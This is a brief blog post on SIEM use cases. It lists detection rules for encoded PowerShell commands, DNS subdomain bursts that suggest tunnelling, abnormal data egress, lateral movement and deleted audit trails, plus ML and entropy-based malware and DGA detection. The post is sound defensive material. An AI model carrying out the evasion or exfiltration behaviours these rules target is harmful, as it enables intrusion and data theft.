ANATOMY OF SIEM USE CASES

There are many standard SIEM use cases like:

Those standard use cases supported by most of the SIEM solutions.

There are some advanced use cases (rules) like:

• Warn if Powershell command with base64 format and more than 100 characters appears
• Password changes for the same user more than 3 within 30 days
• If there are more than 10 DNS requests within 5 minutes which have the same domain but different subdomains, notify. Example: xxx.domian.com , yyy.domian.com
• Misuse of an account
• Lateral movement

Some SIEM solutions support some of those use cases. But not all of them.

There are use cases specific to next-gen SIEM solutions like:

• Returns days where a user accessed more than his 95th percentile number of assets
• Look for a user whose http to dns protocol ratio is %300 more than %95 of the other users for the last four-week ratio for 4th day of week
• If a user number of failed authentication ratio to number of successful authentication is %10, alert
• Data loss detection by monitoring all endpoints for an abnormal volume of data egress

Besides those next-gen use cases, a modern SIEM should leverage machine learning to detect

• Suspicious/Malicious Processes
• Suspicious/Malicious Files
• Suspicious/Malicious services
• Malwares

Also a modern SIEM should measures the similarity between well-known process names with the running ones using Levenshtein distance in real-time and detect process masquerade.

DGA detection using entropy is another next-gen SIEM feature.

Real-time detection is critical for SIEM. Use cases such as unauthorized changes to configs or deletion of audit trails are very crucial. These should be escalated immediately to stop the damage and minimize further risks. All next-gen SIEM has the capability of real time detection.

Originally published at https://www.peerlyst.com on December 23, 2019.